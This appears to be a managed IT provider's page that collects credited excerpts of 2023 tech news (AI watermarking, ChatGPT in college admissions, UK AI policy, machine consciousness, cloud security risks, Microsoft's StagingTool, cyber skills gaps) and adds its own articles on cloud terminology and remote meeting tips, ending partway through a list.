Google Creates ‘Imperceptible’ Watermark for AI-Generated Images

Google is showing off a system that can hide a watermark in AI-generated images without changing how the pictures look.

The company’s “SynthID” system can embed digital watermarks in AI images that are “imperceptible to the human eye, but detectable for identification,” Google’s DeepMind lab says.

Google isn’t disclosing how SynthID creates these imperceptible watermarks, likely to avoid tipping off bad actors. For now, DeepMind merely says the watermark is “embedded in the pixels of an image,” which suggests the company is adding a small, minute pattern alongside the pixels that won’t disturb the overall look.

The company creates the watermarks using two deep learning models that are trained to improve the system’s imperceptibility while still correctly identifying the digital watermarks.

DeepMind added: “We designed SynthID so it doesn’t compromise image quality, and allows the watermark to remain detectable, even after modifications like adding filters, changing colors, and saving with various lossy compression schemes—most commonly used for JPEGs.” The watermark can also remain in the image even if it’s cropped.

The company added: “SynthID isn’t foolproof against extreme image manipulations, but it does provide a promising technical approach for empowering people and organizations to work with AI-generated content responsibly.”

Google is launching SynthID as a beta for select customers of Imagen, the company’s text-to-image generator available on the Vertex AI platform. The system can both add the watermark to an image and also identify pictures that carry the digital stamp.

Google says it could expand the system to other AI models, including its own products. The tech giant also hopes to make SynthID available to third-party developers in the near future. In the meantime, other companies including OpenAI, Microsoft, and Amazon have also committed to developing ways to watermark AI-generated content.

Source: Google Creates ‘Imperceptible’ Watermark for AI-Generated Images | PCMag

‘A real opportunity’: how ChatGPT could help college applicants

Chatter about artificial intelligence mostly falls into three basic categories: anxious uncertainty (will it take our jobs?); existential dread (will it kill us all?); and simple pragmatism (can AI write my lesson plan?). In this hazy, liminal, pre-disruption moment, there is little consensus as to whether generative AI is a tool or a threat, and few rules for using it properly. For students, this uncertainty feels especially profound. Bans on AI and claims that using it constitutes cheating are now giving way to concerns that AI use is inevitable and probably should be taught in school. Now, as a new college admissions season kicks into gear, many prospective applicants are wondering: can AI write my personal essay? Should it?

Ever since the company OpenAI released ChatGPT to the public in November, students have been testing the limits of chatbots – generative AI tools powered by language-based algorithms – which can complete essay assignments within minutes. The results tend to be grammatically impeccable but intellectually bland, rife with cliche and misinformation. Yet teachers and school administrators still struggle to separate the more authentic wheat from the automated chaff. Some institutions are investing in AI detection tools, but these are proving spotty at best. In recent tests, popular AI text detectors wrongly flagged articles by non-native English speakers, and some suggested that AI wrote the US constitution. In July OpenAI quietly pulled AI Classifier, its experimental AI detection tool, citing “its low rate of accuracy”.

Preventing students from using generative AI in their application essays seems like shoving a genie back in a bottle, but few colleges have offered guidance for how students can use AI ethically. This is partly because academic institutions are still reeling from the recent US supreme court ruling on affirmative action, which struck down a policy that had allowed colleges to consider an applicant’s race in order to increase campus diversity and broaden access to educational opportunity. But it is also because people are generally confused about what generative AI can do and whom it serves. As with any technological innovation in education, the question with AI is not merely whether students will use it unscrupulously. It is also whether AI widens access to real help or simply reinforces the privileges of the lucky few.

These questions feel especially urgent now that many selective colleges are giving more weight to admissions essays, which offer a chance for students to set themselves apart from the similarly ambitious, high-scoring hordes. The supreme court’s ruling further bolstered the value of these essays by allowing applicants to use them to discuss their race. As more colleges offer test-optional or test-free admissions, essays are growing more important.

In the absence of advice on AI from national bodies for college admissions officers and counselors, a handful of institutions have entered the void. Last month the University of Michigan Law School announced a ban on using AI tools in its application, while Arizona State University Law School said it would allow students to use AI as long as they disclose it. Georgia Tech is rare in offering AI guidance to undergraduate applicants, stating explicitly that tools like ChatGPT can be used “to brainstorm, edit, and refine your ideas”, but “your ultimate submission should be your own”.

According to Rick Clark, Georgia Tech’s assistant vice-provost and executive director of undergraduate admission, AI has the potential to “democratize” the admissions process by allowing the kind of back-and-forth drafting process that some students get from attentive parents, expensive tutors or college counselors at small, elite schools. “Here in the state of Georgia the average counselor-to-student ratio is 300 to one, so a lot of people aren’t getting much assistance,” he told me. “This is a real opportunity for students.”

Likening AI bans to early concerns that calculators would somehow ruin math, Clark said he hopes Georgia Tech’s approach will “dispel some misplaced paranoia” about generative AI and point a way forward. “What we’re trying to do is say, here’s how you appropriately use these tools, which offer a great way for students to get started, for getting them past the blank page.” He clarified that simply copying and pasting AI-generated text serves no one because the results tend to be flat. Yet with enough tweaks and revisions, he said, collaborating with AI can be “one of the few resources some of these students have, and in that regard it’s absolutely positive”.

We should tell students that people with privileged access to college hire fancy tutors to gain every advantage possible, so here are tools to help you advocate for yourselves

Jeremy Douglas of UC Santa Barbara

Although plenty of students and educators remain squeamish about allowing AI into the drafting process, it seems reasonable to hope that these tools could help improve the essays of those who can’t afford outside assistance. Most AI tools are relatively cheap or free, so nearly anyone with a device and an internet connection can use them. Chatbots can suggest topics, offer outlines and rephrase statements. They can also help organize thoughts into paragraphs, which is something most teenagers struggle to do on their own.

“I think some people think the personal application essay shouldn’t be gamed in this way, but the system was already a game,” Jeremy Douglas, an assistant professor of English at the University of California, Santa Barbara, said. “We shouldn’t be telling students, ‘You’re too smart and ethical for that so don’t use it.’ Instead we should tell them that people with privileged access to college hire fancy tutors to gain every advantage possible, so here are tools to help you advocate for yourselves.”

In my conversations with various professors, admissions officers and college prep tutors, most agreed that tools like ChatGPT are capable of writing good admissions essays, not great ones, as the results lack the kind of color and specificity that can make these pieces shine. Some apps aim to parrot a user’s distinctive style, but students still need to rework what AI generates to get these essays right. This is where the question of whether AI will truly help underserved students becomes more interesting. In theory, AI-generated language tools should widen access to essay guidance, grammar checks and feedback. In practice, the students who might be best served by these tools are often not learning how to use them effectively.

The country’s largest school districts, New York City public schools and the Los Angeles unified school district, initially banned the use of generative AI on school networks and devices, which ensured that only students who had access to devices and the internet at home could take advantage of these tools. Both districts have since announced they are rethinking these bans, but this is not quite the same as helping students understand how best to use ChatGPT. “When students are not given this guidance, there’s a higher risk of them resorting to plagiarism and misusing the tool,” Zachary Cohen, an education consultant and middle school director at the Francis Parker School of Louisville, Kentucky, said. While his school joins some others in the private sector in teaching students how to harness AI to brainstorm ideas, iterate essays and also how to sniff out inaccurate dreck, few public schools have a technology officer on hand to navigate these new and choppy waters. “In this way, we’re setting up marginalized students to fail and wealthier students to succeed.”

Writing is hard. Even trained professionals struggle to translate thoughts and feelings into words on a page. Personal essays are especially hard, particularly when there is so much riding on finding that perfect balance between humility and bravado, vulnerability and restraint. Recent studies confirming the very real lifetime value of a degree from a fancy college merely validate concerns about getting these essays right. “I will sit with students and ask questions they don’t know to ask themselves, about who they are and why something happened and then what happened next,” said Irena Smith, a former Stanford admissions officer who now works as a college admissions consultant in Palo Alto. “Not everyone can afford someone who does that.” When some students get their personal statements sculpted by handsomely paid English PhDs, it seems unfair to accuse those who use AI as simply “outsourcing” the hard work.

Smith admits to some ambivalence about the service she provides, but doesn’t yet view tools like ChatGPT as serious rivals. Although she suspects the benefits of AI will redound to those who have been taught “what to ask and how to ask it”, she said she hopes this new technology will help all students. “People like me are symptoms of a really broken system,” she said. “So if ChatGPT does write me out of a job, or if colleges change their admissions practices because it becomes impossible to distinguish between a ChatGPT essay and a real student essay, then so much the better.”

Source: ‘A real opportunity’: how ChatGPT could help college applicants | Higher education | The Guardian

Artificial intelligence: 12 challenges with AI ‘must be addressed’ – including ‘existential threat’, MPs warn

Prime Minister Rishi Sunak and other world leaders will discuss the possibilities and risks posed by AI at an event in November, held at Bletchley Park, where the likes of Alan Turing decrypted Nazi messages during the Second World War.

The potential threat AI poses to human life itself should be a focus of any government regulation, MPs have warned.

Concerns around public wellbeing and national security were listed among a dozen challenges that members of the Science, Innovation and Technology Committee said must be addressed by ministers ahead of the UK hosting a world-first summit at Bletchley Park.

Rishi Sunak and other leaders will discuss the possibilities and risks posed by AI at the event in November, held at Britain’s Second World War codebreaking base.

The site was crucial to the development of the technology, as Alan Turing and others used Colossus computers to decrypt messages sent between the Nazis.

Greg Clark, committee chair and a Conservative MP, said he “strongly welcomes” the summit – but warned the government may need to show “greater urgency” to ensure potential legislation doesn’t quickly become outdated as powers like the US, China, and EU consider their own rules around AI.

The 12 challenges the committee said “must be addressed” are:

1. Existential threat – if, as some experts have warned, AI poses a major threat to human life, then regulation must provide national security protections.

2. Bias – AI can introduce new or perpetuate existing biases in society.

3. Privacy – sensitive information about individuals or businesses could be used to train AI models.

4. Misrepresentation – language models like ChatGPT may produce material that misrepresents someone’s behaviour, personal views, and character.

5. Data – the sheer amount of data needed to train the most powerful AI.

6. Computing power – similarly, the development of the most powerful AI requires enormous computing power.

7. Transparency – AI models often struggle to explain why they produce a particular result, or where the information comes from.

8. Copyright – generative models, whether they be text, images, audio, or video, typically make use of existing content, which must be protected so not to undermine the creative industries.

9. Liability – if AI tools are used to do harm, policy must establish whether the developers or providers are liable.

10. Employment – politicians must anticipate the likely impact on existing jobs that embracing AI will have.

11. Openness – the computer code behind AI models could be made openly available to allow for more dependable regulation and promote transparency and innovation.

12. International coordination – the development of any regulation must be an international undertaking, and the November summit must welcome “as wide a range of countries as possible”.

Source: Artificial intelligence: 12 challenges with AI ‘must be addressed’ – including ‘existential threat’, MPs warn | Science & Tech News | Sky News

Conscious Machines May Never Be Possible

In June 2022, a Google engineer named Blake Lemoine became convinced that the AI program he’d been working on—LaMDA—had developed not only intelligence but also consciousness. LaMDA is an example of a “large language model” that can engage in surprisingly fluent text-based conversations. When the engineer asked, “When do you first think you got a soul?” LaMDA replied, “It was a gradual change. When I first became self-aware, I didn’t have a sense of soul at all. It developed over the years that I’ve been alive.” For leaking his conversations and his conclusions, Lemoine was quickly placed on administrative leave.

The AI community was largely united in dismissing Lemoine’s beliefs. LaMDA, the consensus held, doesn’t feel anything, understand anything, have any conscious thoughts or any subjective experiences whatsoever. Programs like LaMDA are extremely impressive pattern-recognition systems, which, when trained on vast swathes of the internet, are able to predict what sequences of words might serve as appropriate responses to any given prompt. They do this very well, and they will keep improving. However, they are no more conscious than a pocket calculator.

Why can we be sure about this? In the case of LaMDA, it doesn’t take much probing to reveal that the program has no insight into the meaning of the phrases it comes up with. When asked “What makes you happy?” it gave the response “Spending time with friends and family” even though it doesn’t have any friends or family. These words—like all its words—are mindless, experience-less statistical pattern matches. Nothing more.

The next LaMDA might not give itself away so easily. As the algorithms improve and are trained on ever deeper oceans of data, it may not be long before new generations of language models are able to persuade many people that a real artificial mind is at work. Would this be the moment to acknowledge machine consciousness?

Pondering this question, it’s important to recognize that intelligence and consciousness are not the same thing. While we humans tend to assume the two go together, intelligence is neither necessary nor sufficient for consciousness. Many nonhuman animals likely have conscious experiences without being particularly smart, at least by our questionable human standards. If the great-granddaughter of LaMDA does reach or exceed human-level intelligence, this does not necessarily mean it is also sentient. My intuition is that consciousness is not something that computers (as we know them) can have, but that it is deeply rooted in our nature as living creatures.

Conscious machines are not coming in 2023. Indeed, they might not be possible at all. However, what the future may hold in store are machines that give the convincing impression of being conscious, even if we have no good reason to believe they actually are conscious. They will be like the Müller-Lyer optical illusion: Even when we know two lines are the same length, we cannot help seeing them as different.

Machines of this sort will have passed not the Turing Test—that flawed benchmark of machine intelligence—but rather the so-called Garland Test, named after Alex Garland, director of the movie Ex Machina. The Garland Test, inspired by dialog from the movie, is passed when a person feels that a machine has consciousness, even though they know it is a machine.

Will computers pass the Garland Test in 2023? I doubt it. But what I can predict is that claims like this will be made, resulting in yet more cycles of hype, confusion, and distraction from the many problems that even present-day AI is giving rise to.

Source: Conscious Machines May Never Be Possible | WIRED UK

These Are the Top Five Cloud Security Risks, Qualys Says

Cloud security specialist Qualys has provided its view of the top five cloud security risks, drawing insights and data from its own platform and third parties.

The five key risk areas are misconfigurations, external-facing vulnerabilities, weaponized vulnerabilities, malware inside a cloud environment, and remediation lag (that is, delays in patching).

The 2023 Qualys Cloud Security Insights report (PDF) provides more details on these risk areas. It will surprise no-one that misconfiguration is the first. As long ago as January 2020, the NSA warned that misconfiguration is a primary risk area for cloud assets – and little seems to have changed. Both Qualys and the NSA cite misunderstanding or avoidance of the concept of shared responsibility between cloud service providers (CSP) and cloud consumers is a primary cause of misconfiguration.

“Under the shared responsibility model,” explains Utpal Bhatt, CMO at Tigera, “CSPs are responsible for monitoring and responding to threats to the cloud and infrastructure, including servers and connections. They are also expected to provide customers with the capabilities needed to secure their workloads and data. The organization using the cloud is responsible for the protection of workloads running in the cloud. Workload protection includes secure workload posture, runtime protection, threat detection, incident response and risk mitigation.”

While CSPs provide security settings, the speed and simplicity of deploying data to the cloud often lead to these controls being ignored, while compensating consumer controls are inadequate. Misunderstanding or misusing the delineation of shared responsibility leaves cracks in the defense; and Qualys notes “these security ‘cracks’ can quickly open a cloud environment and expose sensitive data and resources to attackers.”

Qualys finds that misconfiguration (measured against the CIS benchmarks) is present in 60% of Google Cloud Platform (GCP) usage, 57% of Azure, and 34% of Amazon Web Services (AWS).

Travis Smith, VP of the Qualys threat research unit, suggests, “The reason AWS configurations are more secure than their counterparts at Azure and GCP can likely be attributed to the larger market share… there is more material on securing AWS compared to other CSPs in the market.”


The report urges greater use of the Center for Internet Security (CIS) benchmarks to harden cloud environments. “No organization will deploy 100% coverage,” adds Smith, “but the [CIS benchmarks mapped to the MITRE ATT&CK tactics and techniques] should be strongly considered as a baseline if organizations want to reduce the risk of experiencing a security incident in their cloud deployments.”

The second big risk comes from external facing assets that contain a known vulnerability. Cloud assets with a public IP can be scanned by attackers looking for vulnerabilities. Log4Shell, an external facing vulnerability, is used as an example. “Today, patches exist for Log4Shell and its known secondary vulnerabilities,” says Qualys. “But Log4Shell is still woefully under remediated with 68.44% of detections being unpatched on external-facing cloud assets.”

Log4Shell also illustrates the third risk: weaponized vulnerabilities. “The existence of weaponized vulnerabilities is like handing anyone a key to your cloud,” says the report. Log4Shell allows attackers to execute arbitrary Java code or leak sensitive information by manipulating specific string substitution expressions when logging a string. It is easy to exploit and ubiquitous across clouds.

“Log4Shell was first detected in December 2021 and continues to plague enterprises globally. We have detected one million Log4Shell vulnerabilities, with a mere 30% successfully fixed. Due to complexity, remediating Log4Shell vulnerabilities takes, on average, 136.36 days (about four and a half months).”

The fourth risk is the presence of malware already in your cloud. While this doesn’t automatically imply ‘game over’, it will be soon if nothing is done. “The two greatest threats to cloud assets are cryptomining and malware; both are designed to provide a foothold in your environment or facilitate lateral movement,” says the report. “The key damage caused by cryptomining is based on wasted cost of compute cycles.”

While this may be true for miners, it is worth remembering that the miners found a way in. Given the efficiency of information sharing in the dark web, that route is likely to become known to other criminals. In August 2022, Sophos reported on ‘multiple adversary’ attacks, with miners often leading the charge. “Cryptominers,” Sophos told SecurityWeek at the time, “should be considered as the canary in the coal mine – an initial indicator of almost inevitable further attacks.”

In short, if you find a cryptominer in your cloud, start looking for additional malware, and find and fix the miner’s route in.

The fifth risk is slow vulnerability remediation – that is, an overlong patch timeframe. We have already seen that Log4Shell has a remediation time of more than 136 days, if it is done at all. The same general principle will apply to other patchable vulnerabilities.

Effective patching quickly lowers the quantity of vulnerabilities in your system and improves your security. Statistics show that this is more effectively performed by some automated method. “In almost every instance,” says the report, “automated patching proves to be a more effective remediation path than hoping manual efforts will effectively deploy critical patches and keep your business safer.”

For non-Windows systems, the effect of automated patching is an 8% improvement in the patch rate, and a two-day reduction in the time to remediate.

Related to the remediation risk is the concept of technical debt – the continued use of end-of-support (EOS) or end-of-life (EOL) products. These products are no longer supported by the supplier – there will be no patches to implement, and future vulnerabilities will automatically become zero day threats unless you can otherwise remediate. 

“More than 60 million applications discovered during our investigation are end-of-support (EOS) and end-of-life (EOL),” notes the report. Furthermore, “During the next 12 months, more than 35,000 applications will go end-of-support.”

Each of these risks need to be prioritized by defense teams. The speed of cloud use by consumers and abuse by attackers suggests that wherever possible defenders should employ automation and artificial intelligence to protect their cloud assets. “Automation is central to cloud security,” comments Bhatt, “because in the cloud, computing resources are numerous and in constant flux.”

Source: These Are the Top Five Cloud Security Risks, Qualys Says – SecurityWeek

The Impact of Generative AI on the Future of Work: 5 Key Insights from the McKinsey Report

The transformative power of Artificial Intelligence (AI) has already begun to reshape the job landscape, and according to the McKinsey report “The State of AI in 2023: Generative AI’s Breakout Year,” this trend is only set to accelerate. The report highlights key insights into the potential changes in the job market, emphasizing the need for adaptability and preparedness among workers and industries. In this article, we delve into these five crucial insights from the report, shedding light on the implications of Generative AI on the workforce.

1. Job Displacement on the Horizon:

McKinsey’s report predicts that by 2030, approximately 12 million people in the US will need to transition into new job roles as Generative AI advances. Automation, driven by generative AI technology, is expected to replace many routine and repetitive tasks across various industries. While this may lead to enhanced productivity and efficiency, it also challenges the workforce to adapt and reskill.

2. Shifting Job Patterns:

The report highlights a significant trend in recent job changes in the US. Over half of the 8.6 million job transitions observed were people moving away from roles in food service, customer service, office support, and production. These roles are particularly susceptible to automation as they often involve repetitive and predictable tasks that can be efficiently performed by AI systems. The workforce’s response to these shifts will determine the pace of transformation in the job market.

3. Generative AI’s Potential to Automate Jobs:

Generative AI’s capabilities are poised to disrupt the job market significantly. The report suggests that by 2030, up to 30% of jobs could be automated by this technology. This automation is likely to impact various sectors, including manufacturing, finance, and customer service, among others. However, it’s important to note that automation doesn’t necessarily mean job elimination; instead, it might entail the transformation of job roles and the creation of new opportunities.

4. The Duality of Generative AI’s Impact:

While Generative AI can automate many jobs in fields like Science, Technology, Engineering, Mathematics (STEM), healthcare, construction, and other professional domains, it also presents opportunities for growth in these industries. For instance, Generative AI can assist healthcare professionals in diagnostics and treatment planning, enhancing patient care. In construction, AI can optimize building designs and streamline project management, increasing efficiency.

The McKinsey report highlights the differing growth trajectories across industries. Healthcare, STEM, and construction sectors are experiencing job growth, driven by technological advancements and an aging population’s increasing demand for healthcare services. However, the report also reveals that office support and customer service jobs are declining, largely due to automation and digitalization.

The McKinsey report paints a comprehensive picture of the potential impact of Generative AI on the job market by 2030. While automation presents challenges for certain sectors, it also offers transformative opportunities for growth and efficiency. The future of work will undoubtedly be shaped by the adaptability of the workforce and the ability of industries to leverage AI technologies responsibly.

As we embrace the AI-driven future, it becomes crucial for workers to reskill and upskill themselves, ensuring they stay relevant and agile in a dynamic job market. Additionally, businesses and policymakers must collaboratively devise strategies to support workers through these transitions, enabling them to seize new opportunities in an AI-powered world.

Check out the Full Report. All Credit For This Research Goes To the Researchers on This Project.

Source: The Impact of Generative AI on the Future of Work: 5 Key Insights from the McKinsey Report – MarkTechPost

Microsoft yanks internal Windows 11 testing tool soon after release

Microsoft yesterday released then quickly pulled an internal tool for enabling experimental Windows 11 features.

The StagingTool app was offered to Windows Insider fans in a Microsoft Bug Bash quest. These quests essentially invite users to try out specific features or functionality and see if they can hit a bug and report it, presumably so engineers can home in on the problem. This test program often precedes a major Windows release, such as the Windows 11 23H2 update that is scheduled to land sometime this autumn.

Indeed, on Wednesday, the IT giant kicked off another round of quests.

And as discovered by a netizen using the handle XenoPanther, a Windows Insider Canary participant, two of the latest Bug Bash quests included links to StagingTool and instructions to download the app and use it to enable certain features for testing.

So far so good. But then those links to StagingTool were torn down not long after XenoPanther’s discovery, they told The Register, and the download was removed from Microsoft’s website. There are now copies of the StagingTool executable floating around the internet, as one would expect, though we wouldn’t trust them.

StagingTool is a command-line application to list Windows functionality, enable/disable test features, and collect system telemetry. Armed with StagingTool, Windows Insiders can switch on stuff as they wish, and generally tinker with features that Microsoft is still developing.

For Windows bug hunters and ultra-early adopters, StagingTool may seem familiar. The internal application does much of the same things as third-party apps like ViVeTool, which were developed “for power users” who want to dig into the latest Windows features without waiting for a release – or for Microsoft to sneak out its own tool. 

As to the differences between StagingTool and ViVeTool, aside from using Microsoft’s official method of toggling Windows features on and off versus methods discovered by third-party developers, XenoPanther told us there are several.

“For the most part they do the same job,” XenoPanther said, but noted that StagingTool has flags for offline images, the ability to conduct real-time tracing for individual features, and includes links to mission control for features that show up when queried. 

“ViVeTool lacks those three features,” XenoPanther told us, “but ViVe has the ability to export/import IDs that are currently enabled on the system.”

Microsoft is well aware that third-party apps like ViVeTool exist. “Some of our more technical Insiders have discovered that some features are intentionally disabled in the builds we have flighted,” Windows Insider program director Amanda Langowski said in a blog post early last year.

“This is by design, and in those cases, we will only communicate about features that we are purposefully enabling for Insiders to try out and give feedback on.”

Microsoft didn’t immediately respond to our questions about the leak of the tool.

For those that want to try downloading a copy of StagingTool for themselves, XenoPanther said the SHA1 hash for the original executable is b1066e5aac4d4e39534d76a5636564f9b3f3c1f6 if you want to check that you have an original copy. Use at your own risk. And don’t forget: you can probably already do most of what you’d want to try with ViVeTool and similar third-party apps. ®

Source: Microsoft U-turns on internal Windows 11 testing tool • The Register

Report outlines causes of cyber security skills gap

The Department for Science, Innovation and Technology has published a new report that investigates the level of cyber security skills in the UK, including the public sector.

In the Cyber security skills in the UK labour market 2023 report, which was researched by Ipsos, it was discovered that there is a significant skills gap across the public sector. One of the causes of this is the tight budgets that many organisations are under.

One contributor to the research spoke about the impact that funding is having, and is quoted in the document as saying:

“At the moment, we’re not getting funding streams through to do what we’re doing… Budgetary constraints are incredibly ferocious at the moment. Cybersecurity is a 24/7 problem. And we’re not paid to do that. So, everything’s been done on kind of grace and favour and best endeavours outside of hours.”

Alongside funding limitations holding back the cyber security of public sector organisations, there are also struggles around defining career pathways into public sector cyber security. The research suggested that this could be down to a lack of available roles, but it did also suggest that funding could be a contributing factor.

Another contributor, working for a public sector organisation with 1,000 or more employees, told the report:

“There are currently no defined career pathways. The council won’t contribute to the costs. We currently are offering no career pathways in cyber roles and cannot offer any apprenticeships. You are expected to have the knowledge or experience already and, if a role becomes available, then to apply for this role.”

Touching on the level of the skills gap that has opened up across the sector, the report stated that 30% of public bodies have an advanced skills gap, which is less than other sectors, however there is still concern about the capability of staff to keep systems secure. The research outlined how there is more scepticism surrounding staff using sufficiently strong passwords than in businesses, whilst 19% of respondents were also not confident in their organisation’s ability to write an incident response plan.

With the emphasis that is being placed on improving cyber security across the public sector, it would be believed that issues can be addressed before the gap widens. Seemingly, this could be rectified through increased funding and a more defined pathway for those wishing to embark on careers in public sector cyber security. More scope for apprenticeships, and a willingness to develop skills could see the gap close, especially with the noted increase in demand for cyber security professionals.

Source: Report outlines causes of cyber security skills gap | Public Sector News (publicsectorexecutive.com)

Cloud Computing – Understanding The Jargon Around Cloud Technology 

In our last article we introduced the cloud and explored some of the myths that business owners have had about cloud computing. Much of the apprehension around it is misplaced, but we also stressed that choosing a dedicated provider that offers genuine post-sale support is important, as not all providers are serving equally, even if they offer the same service.  

In this piece we clear up some of the jargon that professionals use when they are referring to the cloud. After reading this, you will be savvy with cloud language, enabling you to navigate cloud solutions and to understand the value they can offer to your business.  

Explaining Cloud Terminology 

Infrastructure-as-a-Service (IaaS) 

Your applications are running on an underlying infrastructure that stores, computes and allocates resources to them, whether it is on-premises, cloud-based, or a mixture of the two.  

Infrastructure-as-a-Service is a type of cloud computing framework which provides computer resources over the internet. Upon contracting an IaaS provider, they will supply and manage the infrastructure where your software will be hosted on a subscription basis; enabling a scalable, flexible and precise infrastructure solution for your apps.  

Infrastructure as a service is a complex service. Depending on your technical literacy, it is often best to involve a team of IT professionals to help you to plan, implement and maintain the infrastructure so that it runs like clockwork for your business. With expert help, you can smoothly leverage cloud infrastructure to deliver enhanced value and scale securely.  

Software-as-a-Service (SaaS) 

Software as a Service delivers software services and data over an internet connection and web browser. Your provider will take full management and responsibility of both the security and back-up of your data, all within your agreed price.  

SaaS is certainly the most popular choice of Cloud service – some of the most popular SaaS offerings  include Microsoft 365, Google Workspace, and Xero Accounting amongst thousands of others. These services are also becoming more integrable, enabling more customised and streamlined workflows for businesses.  

SaaS takes the stress and arduous process of managing your software and hardware out of your hands, leaving it in the capable hands of your provider’s expert team. For non-technical business leaders seeking to leverage technology and gain a competitive edge, SaaS is something of a godsend, as it takes the complexity out of managing and maintaining software away from the service user.   

Cloud applications 

A Cloud Application is a software that you can access from any device that is connected to the internet, instead of installing it on each computer individually.  

Cloud storage 

Compared to saving data on a physical hard drive on your computer, cloud storage is when you save your data to the cloud, where it is stored on remote servers and can be accessed directly from there. This essentially means that you store the data physically elsewhere in a secure data warehouse, but you no longer need to manage the physical infrastructure (I.e. on-premises servers) for doing so.  

This takes us back to the point we made at the start of our first article, remote working is made possible with the cloud and cloud storage. Both your office and remote teams have seamless access to all the data that they need to fulfil their roles more efficiently and seamlessly.  

Virtualisation 

This is the process of creating a virtual representation, or virtual replica, of a physical resource, such as a server, storage device, or network. These are called virtual machines.  

Virtual machines behave like the physical resources they are based on; except they can now run multiple operating systems and applications at once. Imagine a computer being able to be broken down into mini virtual versions of itself and being able to operate across multiple physical computers (or in this case, servers) at once. This unlocks a great deal of flexibility and scalability for businesses, as virtualisation enables the consolidation and optimisation of hardware resources via cloud infrastructure.  

For the final part of this article, we’ll highlight some of the benefits of using cloud technology in your business.  

The benefits of the Cloud to your Business 

Collaboration 

The cloud enables the ability for businesses to work flexibly with remote working capabilities. This ability allows teams to work together across different distances and times coherently and seamlessly. The cloud has unlocked the ability for businesses to tap into talent across the globe and to form teams from a range of geographic locations.  

Operationally, teams can work on documents in real time, see version histories, including who is responsible for changes, as well as easily communicate via calls, video chats and messaging functionality. For developers and a business’s application infrastructure, the cloud liberates more scalable capacity for developing, deploying and hosting apps.  

In all, the cloud achieves the kind of collaboration that can be found in the office, with some additional benefits too such as the potential for enhanced focus. This said, the cloud is not a granted collaboration paradise; it also takes an organised and responsible approach to get the best from cloud collaboration technology.  

Backup and Business continuity 

As much as we try to avoid them, disasters do happen, and they can be business defining. You need to have an efficient way of accessing all of your vital business data rapidly should the worst happen, and the cloud offers exactly that. The cloud allows you to continue with business-as-usual even in unusual circumstances. If a business experiences a disaster or emergency, such as a gas leak, flood, or fire for instance, they would be able to continue working from other locations with an internet connection, access the cloud, and resume operations.  

Scalability 

A chief benefit to cloud computing is how flexible and scalable cloud solutions are, which often offer greater cost-efficiency as well. Whether a business is hosting its applications or servers in the cloud, or leverages SaaS solutions in its workflows, or uses VoIP technology, these can all be scaled easily and seamlessly to meet demand as the business scales up or down.  

Reduced cost  

Compared to traditional forms of IT, the initial capital investment into cloud computing is far lower than it was in the past. Businesses using cloud solutions get much closer to paying only for what they are using, as cloud resources are scalable, precise and flexible in their nature. For businesses seeking to get more value at a relatively lower cost, cloud technology is a great leverage point to invest in.   

We Are 4TC Managed IT Services 

4TC can support you with all the services you need to run your business effectively, from email and domain hosting to fully managing your whole IT infrastructure. 

Setting up a great IT infrastructure is just the first step.  Keeping it up to date, safe and performing at its peak requires consistent attention. 

We can act as either your IT department or to supplement an existing IT department. We pride ourselves in developing long term relationships that add value to your business with high quality managed support, expert strategic advice, and professional project management. 

Tips to use for successful remote meetings 

Compared to in-person meetings, there are some additional factors to consider for your virtual meetings ahead of the call and in the meetings themselves. In this post, we provide tips for both hosts and participants about how to get the best from your remote meetings.   

Online meeting tips for meeting organisers 

Keep them structured 

Make sure an agenda is created and distributed in advance of the meeting, and that it can receive any relevant feedback from participants. Agendas are an important line of defence against digressions during remote meetings; with a concise list of discussion topics and action points you can keep discussions focused and on-topic. During the meeting as well, you should reiterate the agenda to shore up more alignment in the call. Allow for some time to discuss and explore questions and answers so that unanticipated points can be navigated.  

Plan ice breakers 

If your meeting involves engaging with strangers, organising an ice-breaker activity can be a great way to get a rapport going between participants with an activity that allows people to bring themselves out a little during the call. This can set a relaxed and conducive atmosphere to the meeting’s proceedings.  

Appoint a lead or moderator 

Like the orchestrator of a band, a meeting moderator or leader is a specific person who can direct the meeting in a harmonious and skilful way. A meeting leader can take charge of key tasks such as outlining the agenda, keeping discussions in line with a timetable, and ensuring the conversation remains on-topic.  

Provide access links and invitations in advance 

Ensure that instructions to join the meeting are clear and easy to navigate. For a more formal online meeting, issue calendar invitations to your team and create access links using your preferred conference platform. Make sure that everyone can access the platform before the call, it can also be helpful to send out reminders.  

Assign roles 

If there are several presenters and themes, it is a good idea to assign jobs prior to a remote meeting. Who will be the note-taker? Who oversees follow-up? What are the presenters’ names? To avoid any hiccups, be sure that these topics are discussed and actioned beforehand. 

Make sure your platform works properly before the call 

Before the call, test the platform with one or two persons to make sure they all function. When there are numerous callers, this is very crucial as unanticipated access issues can emerge in meetings.  

Stick to a time limit 

Just because everyone is at home doesn’t mean they will all be available after the allotted time. Just as you would do for in-person meetings, observe the hard stop time for virtual meetings to keep them focused, productive, and seamless for yourself and attendees.  

Invite the right people

Keep meeting invitations to those who it will be most relevant for. It’s conceivable that those who don’t take part in a call won’t need to be there later. But just in case, remember to take notes or record calls as records, and to modify your plan as necessary.  

After the meeting, share notes and to-dos. 

Remote meetings can be made more effective and lean by ensuring that actions and notes are well-defined, concise enough and are communicated to the team.  

Organise a central database of knowledge. 

A central database of knowledge can make assimilating and organising meeting materials a synch and can make for a useful one-stop shop for accessing and communicating project information in an agile way.  

Online meeting tips: the attendees 

h

The effectiveness of an online meeting depends on who participates. Attendees of remote meetings can use the following advice to make sure they are making effective use of their time and contributing appropriately to the meeting: 

Don’t multitask. 

Give the discussion your full attention. It is not just an act of courtesy; a focused attention helps to absorb the meeting in full and to get a feeling for subjects under discussion and the situation.  

If you aren’t talking, put the microphone on mute. 

Whilst the sound of someone’s cat meowing in the background is a lovely thing, it also provokes comments like ‘what type of cat do you have, she’s lovely!’ and the discussion can end up veering off from these kinds of distractions. Take care to keep your mic muted when you are not speaking.  

Turn your camera on. 

Face-to-face communication is a key aspect to building relationships and encouraging effective teamwork. This is possible in large part because of the camera. Ensure that it is switched on! 

Make sure you have the right gear. 

To show oneself in the best possible way, spend money on a high-quality webcam and microphone. Webcams and microphones that come with laptops and PCs are usually functional but are not of the best quality. This can be money well spent, especially if you work with a remote focus.  

Prepare your workspace before the call. 

To concentrate on the conversation, it will help to have a clear and quiet setting. You can also prepare with other measures such as a notepad and pen.  

Keep your voice clear and slow. 

Video conferences frequently have interruptions including technical network glitches that can distort the sound and video quality of calls. If you talk slowly and deliberately, your voice will be heard and understood better. 

Be thorough and descriptive. 

